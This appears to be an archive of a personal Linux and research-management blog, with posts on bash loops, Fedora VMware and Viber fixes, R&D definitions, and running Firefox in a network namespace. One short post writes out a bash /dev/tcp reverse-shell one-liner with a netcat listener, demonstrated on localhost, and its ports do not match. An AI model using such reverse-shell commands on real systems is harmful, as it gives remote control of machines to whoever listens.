Wednesday, August 30, 2017

Difference between command substitution and 'while read' in bash

I just changed one of my scripts that, in principle, looked like this:
for i in `find . -type d`
do
     # do some processing on the found directory
done
The new format I use is:
find . -type d | while read i
do
    # do some processing on the found directory
done
While both versions will work in general, the second variant is better for the following reasons:
  1. It's faster. Namely, in the first case the find command has to finish before processing on directories starts. This isn't noticeable for small directory hierarchies, but it becomes very noticeable for large ones. In the second case the find command outputs results and in parallel while loop picks them up and does processing.
  2. In case you have spaces embedded in directory names, the second version will work, while the first won't.
Maybe there are some other advantages (or disadvantages) of the second version, but none I can remember at the moment. If you know any, please write it in the comments!

Tuesday, August 22, 2017

Viber and Fedora 26 SSL errors

I just downloaded and updated Viber on my Fedora. When I tied to start it, it seg faulted with the following errors:
QSqlDatabasePrivate::removeDatabase: connection 'ConfigureDBConnection' is still in use, all queries will cease to work.
Qt WebEngine ICU data not found at /opt/viber/resources. Trying parent directory...
Qt WebEngine resources not found at /opt/viber/resources. Trying parent directory...
Qt WebEngine ICU data not found at /opt/viber/resources. Trying parent directory...
Qt WebEngine resources not found at /opt/viber/resources. Trying parent directory...
qt.network.ssl: QSslSocket: cannot resolve CRYPTO_num_locks
qt.network.ssl: QSslSocket: cannot resolve CRYPTO_set_id_callback
qt.network.ssl: QSslSocket: cannot resolve CRYPTO_set_locking_callback
qt.network.ssl: QSslSocket: cannot resolve ERR_free_strings
qt.network.ssl: QSslSocket: cannot resolve EVP_CIPHER_CTX_cleanup
qt.network.ssl: QSslSocket: cannot resolve EVP_CIPHER_CTX_init
qt.network.ssl: QSslSocket: cannot resolve sk_new_null
qt.network.ssl: QSslSocket: cannot resolve sk_push
qt.network.ssl: QSslSocket: cannot resolve sk_free
qt.network.ssl: QSslSocket: cannot resolve sk_num
qt.network.ssl: QSslSocket: cannot resolve sk_pop_free
qt.network.ssl: QSslSocket: cannot resolve sk_value
qt.network.ssl: QSslSocket: cannot resolve SSL_library_init
qt.network.ssl: QSslSocket: cannot resolve SSL_load_error_strings
qt.network.ssl: QSslSocket: cannot resolve SSL_get_ex_new_index
qt.network.ssl: QSslSocket: cannot resolve SSLv23_client_method
qt.network.ssl: QSslSocket: cannot resolve SSLv23_server_method
qt.network.ssl: QSslSocket: cannot resolve X509_STORE_CTX_get_chain
qt.network.ssl: QSslSocket: cannot resolve OPENSSL_add_all_algorithms_noconf
qt.network.ssl: QSslSocket: cannot resolve OPENSSL_add_all_algorithms_conf
qt.network.ssl: QSslSocket: cannot resolve SSLeay
qt.network.ssl: QSslSocket: cannot resolve SSLeay_version
qt.network.ssl: QSslSocket: cannot call unresolved function CRYPTO_num_locks
qt.network.ssl: QSslSocket: cannot call unresolved function CRYPTO_set_id_callback
qt.network.ssl: QSslSocket: cannot call unresolved function CRYPTO_set_locking_callback
qt.network.ssl: QSslSocket: cannot call unresolved function SSL_library_init
qt.network.ssl: QSslSocket: cannot call unresolved function SSLv23_client_method
qt.network.ssl: QSslSocket: cannot call unresolved function sk_num
Segmentation fault (core dumped)
After some digging the solution was simple, just execute the following command and it should work afterwards:
sudo ln -s /usr/lib64/libssl.so.10 /opt/viber/lib/libssl.so

Wednesday, July 19, 2017

When superstitious are good...

I just read the following paper:
Nunn, Nathan, and Raul Sanchez de la Sierra. Why Being Wrong can be Right: Magical Warfare Technologies and the Persistence of False Beliefs. No. w23207. National Bureau of Economic Research, 2017.
and I find it very interesting. Basically it is about why superstitions are good in certain cases. In this paper the author analyzes a case of a village in a Democratic Republic Congo. Namely, due to the unstable political situation there are lot of violence done  by different military groups that regularly attack villages. To protect themselves people in some villages believe they can be made resistant to bullets by strictly following a special magical procedure. It's obviously false but in case someone dies they prescribe the fault to not following this special magical procedure. This sounds crazy, but the effect is interesting. While it hurts individuals, it helps the collective since more people are willing to engage in defending villages with the end result of having 2 years of peace in this specific village that was brought as an example.

The key is that the utility of individual increases by everyone contributing to defense, but decreases when individual invests more. This, in effect, means that everyone will not invest the best he can and thus the collective will suffer! The superstition encourages everyone to give the best they can thus helping the collective. This is brilliant!

This result provokes some thinking as to whether some superstitions that I find annoying are actually beneficial, like religion for example. 

Sunday, July 16, 2017

Fedora 26 (kernel 4.11.9) and VMWare Workstation 12.5.7

I just upgraded Fedora 25 to Fedora 26 and of course there was a problem with VMWare Workstation. If you try to start vmware binary, it just silently fails. Anyway, I managed to find a solution here. In essence it is necessary to replace two share libraries and then manually compile vmmon and vmnet modules. The reason for this is that on Fedora GCC 7.1 is used which is a newer compiler that used to compile VMWare. So, to replace libraries, type:
# cp -r /usr/lib/vmware-installer/2.1.0/lib/lib/libexpat.so.0 /usr/lib/vmware/lib
# cd /usr/lib/vmware/lib/libz.so.1
# mv -i libz.so.1 libz.so.1.old
# ln -s /usr/lib64/libz.so.1 .
And to compile vmmon and vmnet you have to go into /usr/lib/vmware/modules/sources directory and unpack vmnet.tar and vmmon.tar files. Then, in each of them, issue make command. Finally, files ending with .ko move to /lib/modules/`uname -r`/misc (create it if necessary) and then run 'depmod -a' command. I also had to manually load those modules with 'modprobe vmnet' and 'modprobe vmmon' commands.

The only problem I noticed so far is that after inserting vmnet kernel module network interfaces are not automatically created. To fix that just run vmware-netcfg command and save configuration. After that, everything should be OK.

Sunday, May 21, 2017

The role of scientific conferences in R&D

In this post I'm dealing with a very important question from the perspective of a person managing or financing R&D, how does one know how well is R&D performing? If your thought was that you'll measure it by economic success of a product that uses the results of R&D then you are on a wrong track. Namely, the product can be success or a failure because of a number of reasons, of which R&D is only one. So, another way has to be used, and actually this question is very hard. In this post I'll try to point you to a possible solution along with some of its negative sides. Before continuing, just to reiterate that this post is from the perspective of a person managing or financing R&D.

The best possible solution would be that you absolutely trust all your researchers and that they produce only the best results. But this is idealistic case, namely there are no perfect researchers, and even the best ones could produce mediocre results if they are under sufficiently high pressure. So, some form of quality assurance is necessary.

The next best solution would be for you to check what every researcher did and evaluate it by yourself, after all, whom do you trust more than yourself? But this approach also has problems, and not the small ones:
  1. When good researchers does something, the only way to track him would be to do the same things he does, and that means doing his job. 
  2. Even if you would know so much to be able to analyze how someone does his or her job, that wouldn't scale.
  3. Finally, people tend to hate micromanagement, and this would be micromanagement.
So, this approach also wouldn't work. Another approach would be to assign for each researcher another person that would check his work. But this has almost the same problems as if you are doing everything by yourself. Especially problematic could be potential collusion between researchers, i.e. one praises other's work knowing that his own work will be reviewed, too. So, reviewers might have incentive to praise each other's work.

Thus, it is necessary to have review, but the point of the review is to be independent, done by an expert that knows the topic being reviewed and trying to be as objective as possible. You can pay independent researchers for doing review, but that's not done. What's done instead is sending papers to scientific conferences and journals where they are reviewed before being published. The review process is such that the authors don't know who reviewed their paper (blind review) or even reviewers don't know who's paper they are reviewing (double blind review). Before being published in a journal or on a conference, papers have to pass review process and authors are notified about the decision along with receiving reviewers' comments.

So, there is a way you can receive feedback about the work done by your researchers by sending them to conferences or requiring them to publish in journals. But there are additional benefits as well:
  1. Even if your researches have the best intention of producing top class results, it is good to have a feedback. In the reviews there could be suggestions on how to improve the work.
  2. By participating on conferences your researchers build their professional network from people doing the same or similar things and that might be very helpful on the long run.
  3. You should not forget marketing aspects of scientific publications. Namely, this makes you and your people known as an organization that does research and supports their researchers which might attract new researchers and employees.
Many companies having serious R&D do publish on scientific conferences and in journals and they put on their Web pages lists of published works, here are some:
There are many others, and I might add more to the list later.

One very important thing before I continue. People tend to think that I say that publications are mean and a goal and thus are opposing to the idea of publishing on a scientific conferences. But that's not true. Publications are only a side-product of a work who's goal is to produce something new that could be used to improve company's products!

But, nothing is perfect and so this approach has some issues you have to be aware of:
  1. There are a huge number of conferences in the world many of which are at best average. You should strive to go to the best ones because there you'll receive the best feedback and also meet people that are more likely to be researching things that interest you. Which conferences are those depends on the specific research area and you have to search for them, but as a general rule of thumb the lower acceptance ratio, the better conference.
  2. As I've said, the papers are only a side-product of the actual work done. But, if too great emphasize is put on conference/journal publication, then researchers start to optimize that criteria instead of doing a good work.
  3. You should be careful what you publish in the papers. The moment its published, effectively it's a public knowledge. This is very good from the society perspective, but it might not be so good from the perspective of a company.
  4. Publication on the conference is not so cheap. You have to pay conference fee, travel and accommodation expenses, and maybe few more things. This builds up very quickly.
  5. Publication in a journal might cost nothing, but it can take time, up to 18 months. The review process for conferences is several months at most.
But in any case, I think that companies should publish as much as possible on a good conferences or in good journals as it has more benefits than drawbacks.

Thursday, May 18, 2017

What is R&D according to OECD

In my previous post I wrote about my personal opinion what is R&D. In this post I'm going to analyze definition given by OECD, which might be argued to be a relevant authority for such topics. OECD produces for decades a document called Frascati Manual which is about collecting and reporting data about R&D. The latest version is from 2015 and that one is used as the basis for this post. The manual, in Chapter 2, describes what R&D is. Basically they say that the properties of R&D activity are (paragraph 2.7):
  1. novel,
  2. creative,
  3. uncertain,
  4. systematic, and
  5. transferable and/or reproducible.
and activity has to satisfy all those properties to be regarded as R&D activity.

Property of the novelty can be correlated with properties 1 and 2 given in the post with my opinion. The following citations are interesting or important from the manual:
  1. In the Business enterprise sector, the potential  novelty of R&D projects has to be assessed by comparison with the existing stock of knowledge in the industry. [paragraph 2.15]
  2. The R&D activity within the project must result in findings that are new to the business and not already in use in the industry. [paragraph 2.15]
Those two citations mean that if you do something that anyone already does, or that anyone can do in a relatively short period of time, than it's not a product of R&D activity.

The property of creativity, i.e. the results of activities are based on original, not obvious, concepts and hypotheses can be correlated with property 2 given in the post with my opinion. The following excerpt is interesting:
An R&D project requires the contribution of a researcher!
This means that whoever is doing R&D has to have trained researches  in stuff.

The property of uncertainty, i.e. it is uncertain about the final outcome, has a direct relation to the property 5 in the post. The difference is that OECD publication claims that there are multiple dimensions to this property:
For R&D in general, there is uncertainty about the costs, or time, needed to achieve the expected  results, as well as about whether its objectives can be achieved to any degree at all. [paragraph 2.18].
Furthermore, there is discrimination criteria between R&D and non-R&D activities:
Uncertainty is a key criterion when making a distinction between R&D prototyping (models used to test technical concepts and technologies with a high risk of failure, in terms of applicability) and non-R&D prototyping (preproduction units used to obtain technical or legal certifications). [paragraph 2.18]
So, the more certain you are that there will be some functionality in the final product, less it is R&D activity!

The systematic property of R&D, i.e. to be planned and budgeted, correlates with property 4 I gave in the previous post. This, also includes keeping records, not only planning.

The final property, i.e. to lead to results that could be possibly reproduced (transferable and/or reproducible) is most interesting and I didn't include it in the elaboration of my opinion. Namely, this requires that the results be published somewhere so that conclusions can be independently verified. Somehow, it seems to me that this is the least frequent property. If nothing else, because the scientific output of companies is very small. Someone can claim here that they are publishing somewhere else, why only scientific output? The point is that under the expression scientific output I"m referring on the way the results are published, not where they are published. In other words, scientific publication includes all the necessary information in order for someone else to test the results.


For the end, just let mi note that there is another important subdivision of R&D according to OECD publication (paragraph 2.9):

  1. basic research,
  2. applied research, and
  3. experimental development.

I'll write about those in some future post.

Using astrology to protect from APTs

Probably when you saw the title, your reaction was WTF?! Using astrology for APT detection, that's totally crazy! But, the sad fact is that it isn't so crazy after all because large number of products that are offered on the market claim that they are protecting you from APTs in the same way astrology claims it can predict your future.

To elaborate a bit more this claim, the key question is how do you know it's true that protection works? We can rephrase this question into another one: What process did manufacturers use to prove, beyond reasonable doubt, that their products are capable of detecting APTs? Did they publish somewhere what/how they did it? Also, since nothing is perfect, its obvious that no solution will detect all the cases. In how many cases will the products detect APTs, and again, if they provide such numbers, how they came up to them? What is precision, and what is recall? Anyway, this is not published so it is something you have to go buy on trust, not on the numbers and experiments.

Even more, in astrology if things turn out to be different, then the person doing prediction changes story somehow, for example he/she didn't know some crucial information which made the prediction wrong, or they predict in such a way that no matter what happens, it will be true. In other words, you can never falsify the astrology and that is the main reason it isn't science. But the same reasoning goes for products that protect you from APTs, too. Either if they protect you or not you have no way of knowing weather that was a pure luck or in the case of detection if this was something deliberately designed into the product.

So, to conclude, I don't think that majority of products for APT protection are nothing more than application of astrology to cyber security!

Thursday, April 13, 2017

What is R&D and why should SMEs have one?

In this post I would like to describe what is R&D. This is a continuation of a more general idea of cooperation between industry, academia and government about what I wrote in the previous post. By describing what is R&D I hope also to answer the other part of the post's title, why SMEs should have one. In doing so, I'm not going to give formal definitions for now but only my opinion, while definitions I'll leave for another post. Before continuing, I must stress again that I'm not an expert on this subject nor I represent my employer. As such, this is purely my opinion which might be completely wrong. That said, obviously, I don't believe I'm wrong in general though I accept that some ideas might not be well thought out.

I'll start by enumerating several intuitive properties I expect from R&D, looking from the perspective of a company having or wanting to have one:
  1. It adds some new value which can be monetized in some way.
  2. The new value should not be easy to obtain.
  3. It is a midterm process.
  4. It is a process that should be done methodologically with clearly defined steps and goals.
  5. There is uncertainty as to whether there will be positive results, or any results at all.
  6. It is a continuous process.
  7. R&D process requires investment.
Note that when we discuss whether something is R&D and whether something produced is a product of R&D then we are not requiring that all properties hold, it is enough for a majority to hold! Now, let me discuss each property in a bit more detail.

First, there is a property that it adds some new value which can be monetized in some way. I think that this one is obvious. Everything company does has a goal of improving profits. Now, maybe more correctly would be to say that everything company does serves it to fulfill its mission. This view of helping fulfill mission actually broadens potential topics that can be covered by R&D since some results that don't necessarily produce money can also be covered by R&D. But, more on to the earth, the company is there to make profits and if it doesn't do that, than it ceases to exist. So, R&D should support this. I will refer to the purpose of directly increasing profits as R&D in a narrower sense, while R&D in a broader sense supports company mission. I could theorize further that R&D in a broader sense is more expensive with less direct ROI and thus more suitable for large enterprises, while R&D in a narrower sense is more suitable for SMEs. Nevertheless, in the following text I'll concentrate only on R&D in a narrower sense unless I explicitly say otherwise.

The next property of R&D is that a new value produced should not be easy to obtain. In other words, if the output of some, supposedly R&D, activity is something that anyone can come up immediately, then it's not the product of R&D activity and probably there is no R&D activity at all. This property is desirable for a simple reason that it helps company keep competitive edge. The more a single company has something that others don't have, the more competitive it is and likely the more successful. But, there is a but. Namely, some outputs of R&D are complex and others are deceptively simple. The advantage of having complex products is intuitively easy to understand by anyone, but the simple ones seek some clarification. Namely, they are indeed simple but the process of generating them isn't simple. You can find examples of such output everywhere. How many times you learned something and your first reaction was: How I did not think of that !? Well, that's because the process to reach it is hard, but the output itself is simple. Now, it is obvious that copying simple stuff is easy and to prevent that patent system was invented.

The third property is somewhat related to the previous one, i.e. R&D is a medium term process. The reason is that short term process is less likely to produce something that fulfills the previous property of not easily replicating results, but other properties are also harder to achieve. In other words, if you invest brief time into development of something, in general you can expect some simple results. On the other hand, having a long-term projects allows one to obtain very good, deep, well thought out results, but in a fast paced world it is entirely possible that the results once obtained, are useless. It also might happen that in the meantime, due to not having any results, company doing R&D fails and vanishes from the market. So, the key is to have a process that is long enough to produce useful results, but not too long for these results to be useless. Finding sweet spot is more of an art than a science.

The fourth property, that the R&D process should be done methodologically with clearly defined steps and goals, basically means that certain steps have to be present. For example, goals or requirements must be defined in order to be able to assess whether the result meets goals set at the beginning or not. Then, there has to be exploratory step of studying existing work, i.e. repeating what already has been done is definitely not something that leads to good R&D, or R&D at all. If nothing else, where is the added value required by one of the previous properties? Even worse, it might happen that the results obtained are worse than what the others achieved, and potentially use. After all, the current state of the art was reached through a lot of investments - in terms of time and money. Not to mention that there is a problem with patents and it doesn't matter if you something copied or invented on your own. If it is patented, you cannot use it without the consent of the patent holder! To continue with steps that should be present in R&D activity, we also have to mention evaluation of proposed solutions. It is mandatory. This can be done by experiments, simulations, etc. The evaluation must be done in a rigorous way so that it is beyond reasonable doubt that proposed solutions do indeed lead to better results. I'll stop here because I intent to write more about this topic in a separate post that deals with an issue of how to establish R&D.

The fifth property is uncertainty as to whether there will be positive results, or results at all. There is a reason why it is called research and development. If it were not so, then it would be engineering. Note that sometimes people mistakenly confuse uncertainty in building a new product that could fail on market with the uncertain results of a research. The two are independent and might interplay in several ways. What we are talking about here is that when doing R&D it might happen that the ideas or goals turn out to be non-feasible. But, this has nothing to do with the fact that if the ideas and goals are feasible, will they be successful on the market or not. Take for example an idea about a system that would allow replacement of programmers. This goal isn't achievable and no R&D activity would be able to produce something like that. But, if it were achievable, it would certainly be huge commercial success. So, care should be taken not to confuse uncertainty of research results with uncertainty of market success.

Finally, the sixth property of continuity of R&D process is something that should be satisfied in order for R&D to be useful. This follows from the ever-changing environment and improving competition. If some company does one-shot R&D this could help the company in a short run, but in the long run there will be no benefit from having R&D.  So, just as company has to continuously adapt to state of the environment, so R&D has to be there to support necessary changes. There is also one additional reason for continuous R&D process. Namely, it is rather expensive to establish R&D process so payoffs are better if R&D is established and allowed to continuously function.

The seventh property I added later, after colleague of mine read the post and commented that the R&D process is expensive. After some thought I decided to rephrase it differently, namely R&D process requires investment. I'm still not certain whether this should be separate property or not because I believe it is implied by combination of previous properties. In the end, I decided to put it as a separate property, just in case. I should clarify this property a bit. Namely, everything is expensive when we talk about activities in the company, but it is outweighed by earnings which are immediate, either direct (e.g. selling a product to a customer) or indirect (e.g. bookkeeping activities). R&D is different in two aspects. First, it requires investment with returns coming only later and in a long run - if there is a result from R&D at all (property 5).

In conclusion, I listed six (seven) properties that can be used to determine if some company is doing R&D or it has something it thinks is R&D. Probably those are not the only properties and if you have any to add (or you think that some of the listed above is not important) please comment and provide your arguments. Anyway, probably not all of the listed properties will be present in many cases of R&D in the companies but as I said in the introduction majority would do. Maybe we can also talk about R&D maturity, i.e. the more properties are present, the more mature process is. But I'll leave this for another post.


Wednesday, April 5, 2017

Cooperation between industry, academia and government

This is a first in a series of post (I hope) that will deal with research and development in small and medium enterprises. The reason for me being interested in this topic will be clear after I describe a bit how I got into this. And before I start, let me clearly state that I'm not an expert for economy, management, or even a question of what science is. Everything I say is my personal view at the moment I wrote the blog posts and has nothing to do with anyone else. Especially it is not official position of Faculty or University.

I work on the Faculty of Electrical Engineering, University of Zagreb. My firm belief is that no university can be successful in a long run without being part of a prospective environment. The vice versa also holds, i.e. local economy can not be competitive and successful without support of a good university and colleges. To give an example that support this attitude, Stanford wouldn't be what it is without a brilliant leadership by Fred Terman who's vision helped create Silicon Valley. In essence he created successful local environment that helped Stanford, and the circle was closed.

Yes, we live in a global, highly connected world, and any student can work where ever she/he wants, the same goes for me. Furthermore, anyone can come to Croatia and work here, at least in principle. I can also cooperate with anyone I wish in the world. After all, just that is supported by EU through different programs, most notably Horizon 2020 which is encouraging EU companies and universities to cooperate. This is good, and necessary, but it is not so perfect for one simple reason, and that is the question who is paying me, and who is paying for education of students coming to my university? The answer isn't so global, it is actually very local. All that is payed by tax payers in Croatia, and tax payers are individuals and companies living and existing in Croatia!

With all that said, I think it is very important for local economy to grow and I must do as much as I can to help local companies grow and develop for a mutual benefit. And more importantly, I think that anyone in Croatia, working in companies or on universities, has to see things in such a way.

Now, we come to the question on how to help? The answer is actually quite straightforward, I should do what I'm supposed to do on the University, i.e. research. The companies should cooperate and contract universities for research in order to become more efficient, to have better and more competitive products and services. The truth is that not many companies have enough resources for research and development. It is a risky and expensive endeavor. So, the companies should rely on University and on EU funding. Namely, University provides research resources and EU with funding takes a part of the risk. Of all the funding available, I'll concentrate on one specific that supports Smart specialization, for several reasons:
  1. I was directly involved in one segment of its preparation.
  2. I'm involved in applications for several projects.
  3. It tries to connect universities and commercial sector.
  4. It isn't meant for large pan-European projects, but projects within a single country. 
Three years ago I was involved in the development of Smart specialization strategy (S3) of Republic of Croatia. This involvement lasted for about two years, a bit less. Smart specialization is actually something defined by European Commission which stated that each country (or region) has to specialize in something in order for the EU to be competitive on a global market in a long term. Of course, specialization has to be supported by the current economy, and obviously, it has to be focused. Now, I'm not aware of what other countries did, nor did I spent to much time searching around, so what I'm going to write is probably specific to Croatia, and even more specific for cyber security (one of the subareas selected for specialization in Croatia is cyber security which, which is where most of my work is done). One of the goals of S3 is to encourage commercial, academic and government sectors to cooperate. This should in turn make commercial sector more competitive.

I'm somehow under the impression that much was talked about S3 while it was developed, but now when the strategy is defined and we have to implement it there are not so much events, if there are any (apart from Ministry of Commerce that actually handles all activities related to S3). For example, I'm not aware of a single round table, workshop, conference or anything else organized by someone concerning S3, how it is progressing, have we learnt something, what can be done better, etc.

In the following posts I want to delve more into the following very important topics:
  1. What is R&D and why would SMEs should have one?
  2. How to have R&D?
  3. How to get ideas on what to R&D?
  4. How I think companies behave with respect to S3, and in general towards EU projects.

Monday, April 3, 2017

How to run Firefox in a separate network name space

In this post I'll explain how to run Firefox (or any other application) in a separate network name space. If you wonder why would you do that, here are some reasons:
  1. You connect to a VPN and want a single application to connect via VPN. All the other applications should access network as usual.
  2. You want to know what network resources specific application does access. For example, there is a JavaScript application that runs within the Web browser and you want to monitor it on a network level.
  3. You want to temporarily use another IP address, but in the same time keep the existing network configuration because some applications use it and they wouldn't react well on the change.
  4. You have alternative connection to the Internet (e.g. one via wired interface, and another via LTE) and you want some applications to use LTE, default being wired interface. This is actually variation of the cases 1 and 3, but obviously it's not the same.
Probably there are some other reasons, too, but I think this is enough to persuade you into advantages of using network namespaces on Linux. And note that you can run two instances of Firefox in the same time. One "normal" in the "normal" network namespace, and another one in new and potentially restricted network namespace. More on that later in the post.

So, here is how to create new network name space with network interface(s). Note that there are several different cases, depending on how you connect to the Internet and what you want to achieve. So, there will be several subcases. But first, create a new network name space using the following command (as a root user):
# ip netns add <NSNAME>
NSNAME will be the name of the network name space. You should use something short and meaningful, i.e. something that will associate you to what the network namespace is used for. You can check that there is a network name space using the following command:
# ip netns list
From this point on we have two subcases:
  • You are connected using wired Ethernet interface and you can attach new machines to the Ethernet network.
  • You are connected to the Internet using wireless Ethernet interface or you are connected to the wired Ethernet interface and are not allowed to connect new machines.
All those cases are described in the following subsections.

Wired Ethernet interface

This is the easiest case, and there are several options you can use. We'll use macvlan type of the interface that will create a clone of an existing wired Ethernet interface which will appear on the physical network with its own parameters. This is, in effect, like attaching a new host on the local network. Note that if you are not allowed to connect devices to the network, you should use routing method described for wireless interface.

First step is to create new interface:
# ip link add link <ETHIF> name <IFNAME> type macvlan
The parameters are: ETHIF is your existing Ethernet interface, while IFNAME is a new interface that will be created. You should then move the interface into the target network namespace (we assume here that you want to move it to NSNAME):
# ip link set <IFNAME> netns <NSNAME>
and then you have to activate it:
# ip netns exec <NSNAME> ip link set <IFNAME> up
note that the activation has to be done using "ip netns exec" since to access network interface you have to swich to the network namespace where the interface is! What is left is to assign it an IP address. This can be done statically or via DHCP.

Now that the network part is ready, skip to the section Starting Firefox.

Wireless LAN

In case you are connected to a wireless LAN, then macvlan link type will not work, so another mechanism is necessary. There are two options, bridging and routing. The problem with bridging is that you have to turn off wireless interface before enslaving it into a bridge. That creates two problems. The first one is that all current TCP connections will break, and the second is that it doesn't play nicely with NetworkManager and similar software. Thus, I'll describe routing case.

First, create pair of virtual Ethernet interfaces like this:
ip link add type veth
This will create two new interfaces veth0 and veth1. Those interfaces are actually two ends of a single link. We'll move one interface into another network namespace:
ip link set veth1 netns <NSNAME>
Next we'll configure interfaces with IP addresses. I'll use 10.255.255.1/24 for the interface that's left in the main network namespace (veth0) and 10.255.255.2/24 for the interface in the NSNAME network name space (veth1):
# ip addr add 10.255.255.1/24 dev veth0
# ip link set dev veth0 up
# ip netns exec <NSNAME> ip addr add 10.255.255.2/24 dev veth1
# ip netns exec <NSNAME> ip link set dev veth1 up
# ip netns exex <NSNAME> ip ro add default via 10.255.255.1
we also need to configure NAT because the network 10.255.255.0/24 is only used for the communication of two network namespaces and it should not go outside the host computer:
# iptables -A POSTROUTING -t nat -o wlp3s0 -s 10.255.255.2 -j MASQUERADE
you should change wlp3s0 with the name of your wireless interface. You should take note of two things in case it doesn't work:
  1. Forwarding has to be enabled. This is achieved/checked via sysctl /proc/sys/net/ipv4/ip_forward (it should contain 1).
  2. Maybe your host has firewall that blocks traffic. To check if that's the problem, temporarily disable firewall and try again. Note that disabling a firewall will most likely remove iptables rule you added so you'll have to add it again.

Starting Firefox

Now, when you handled creating the interface within the new network name space, to start Firefox (or any other application) in it, first you should switch into new network name space. Do this in the following way:
# ip netns exec <NSNAME> bash
Note that it is important to do it that way in order to preserve environmental variables, i.e. if you do "su -" or something else, you'll reset environment and you won't be able to start graphical applications. After you got bash shell as a root, switch again to a "normal" user:
su <userid>
again, it is very important to preserve network namespace, so you have to use command su as shown. Obviously, substitute userid with the user ID logged into graphical interface. Next, you should start Firefox:
$ firefox &
In case you already have running instance of Firefox that, for whatever reason, you don't wont to stop then you can start a new instance like this:
$ firefox -P -no-remote&
This will start new instance even though there is a running Firefox proces (-no-remote) and present you with a dialog box to choose a profile to run to. You can not use existing profile so it means that you have to create a new one specially for this purpose. The drawback is that your bookmarks, cookies and other thing won't be visible in a new instance. 

Tuesday, March 28, 2017

Tip: Quick and dirty reverse remote shell

Here is how to get reverse remote shell. I say reverse because the remote system is connecting to you. I'll demonstrate it on a single machine for simplicity. So, open a terminal and run the following command in it:
nc -l 12345
This will start netcat which will listen on port 12345. Then, in the second terminal, run the following command:
/bin/bash -c bash -i >& /dev/tcp/127.0.0.1/8080 0>&1
You won't notice anything in the first window where nc command is running, but try to enter some command there, e.g. pwd. :) What you've got, is remote shell. Obviously, because of the way things work you don't get prompt and other fancy stuff, but it works and that's important. :)

What you basically did is that you run interactive bash process (the option -i) with standard error and standard output redirected to /dev/tcp/127.0.0.1/8080 (redirection operator >&) and also standard output being redirected to the same file (the last 0>&1). The file being redirected to and from is a special notation for the bash shell that allows it to open connections, i.e. the syntax is:
/dev/<protocol>/<ipaddress>/<port>
More details can be found in bash manual page.

Saturday, February 25, 2017

Lock remote deskop over ssh

I had a seemingly simple problem, connect over SSH to remote computer and lock the screen. Simple Google search for "gnome lock screen" yielded a plenty of results all of which revolving about using command gnome-screensaver-command -l.  First of, the package gnome-screensaver isn't installed by default on Fedora, meaning it isn't used there. Then, after installing it I got the following error message:
** Message: Failed to get session bus: Error spawning command line 'dbus-launch --autolaunch=062fabbac04041679f56c8db8593c352 --binary-syntax --close-stderr': Child process exited with code 1
Ok, turns out that session DBus is inaccessible and that gnome-screensaver-command just sends a message over DBus. Using d-feet it was easy to find out object, interface and method to use to lock the screen, but how to access DBus was a bit harder. The easy part was to find out that the key is in environment variable DBUS_SESSION_BUS_ADDRESS which has to point to a DBus daemon socket. But harder was to find where this socket is by looking into usual places on the file system. Finally, turned out that the easiest was to look at the environment of an existing process and get value from there, i.e.:
$ cat /proc/`pidof gnome-shell`/environ | \
              tr '\0' '\n' | grep DBUS_SESSION_BUS_ADDRESS
DBUS_SESSION_BUS_ADDRESS=unix:abstract=/tmp/dbus-dl1GC6PYCt,guid=33abd4a9e6bb3dee9262121d5819bdf1
tr command is necessary because entries in the environment are separated by NULL character (i.e. they are strings in C), so we are changing them into new line. Finally, grep just takes out the entry we are interested in. BTW, sorry for the useless cat use, but it is leftover as I constructed the command. :)

When you have properly set environment variable to access DBus, it is easy to invoke method Lock() that locks the screen, i.e.:
dbus-send --print-reply --session \
          --type=method_call --reply-timeout=3000 \
          --dest='org.gnome.ScreenSaver' \
          /org/gnome/ScreenSaver \
          org.gnome.ScreenSaver.Lock
and that will lock the screen. What's left to do is just to glue everything into a script:
#!/bin/bash
PID=`pidof gnome-shell`
DBUS_SESSION_BUS_ADDRESS=$(tr '\0' '\n' < /proc/${PID}/environ | grep "DBUS_SESSION_BUS_ADDRESS" | cut -d "=" -f 2-) \
dbus-send --print-reply --session --type=method_call --reply-timeout=3000 --dest='org.gnome.ScreenSaver' /org/gnome/ScreenSaver org.gnome.ScreenSaver.Lock
Just copy that into a file, make it executable and try it. It should work every time. :)

Monday, January 30, 2017

Fedora 25, kernel 4.9 and VMWare Workstation 12.5.2

Well, after upgrading Fedora 25 which included kernel 4.9.5, VMWare Workstation stopped working again! The fix is easy, even though it annoying to constantly have to patch something in VMWare. Anyway, the procedure - taken from here - is:
  1. Switch to root account.
  2. Go to /usr/lib/vmware/modules/source.
  3. Make backup of files vmmon.tar and vmnet.tar.
  4. Unpack those files using 'tar xf' command.
  5. Patch file vmnet-only/user_if.c, i.e. you have to open it in you favorite text editor and in function UserifLockPage() that's around line 113 change the following part:
    #if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 6, 0)
        retval = get_user_pages(addr, 1, 1, 0, &page, NULL);
    #else
        retval = get_user_pages(current, current->mm, addr,
                    1, 1, 0, &page, NULL);
    #endif
    with the following:
    #if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 9, 0)
         retval = get_user_pages(addr, 1, 0, &page, NULL);
    #else
    #if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 6, 0)
         retval = get_user_pages(addr, 1, 1, 0, &page, NULL);
    #else
         retval = get_user_pages(current, current->mm, addr,
                     1, 1, 0, &page, NULL);
    #endif
    #endif
  6. Then, in file vmmon-only/linux/hostif.c in function HostIFGetUserPages() that's around line 1158, change the following
    #if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 6, 0)
       retval = get_user_pages((unsigned long)uvAddr, numPages, 0, 0, ppages, NULL);
    #else
       retval = get_user_pages(current, current->mm, (unsigned long)uvAddr,
                               numPages, 0, 0, ppages, NULL);
    #endif
    with
    #if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 9, 0)
       retval = get_user_pages((unsigned long)uvAddr, numPages, 0, ppages, NULL);
    #else
    #if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 6, 0)
       retval = get_user_pages((unsigned long)uvAddr, numPages, 0, 0, ppages, NULL);
    #else
       retval = get_user_pages(current, current->mm, (unsigned long)uvAddr,
                               numPages, 0, 0, ppages, NULL);
    #endif
    #endif
  7. Create new vmmon.tar and vmnet.tar using the following commands:
    tar cf vmnet.tar vmnet-only
    tar cf vmmon.tar vmmon-only
  8. Start vmware as you would normally start it. This will trigger module compilation and everything should work.
Note that you are doing everything at you own risk! :)

Friday, January 6, 2017

Few thoughts about systemd and human behavior

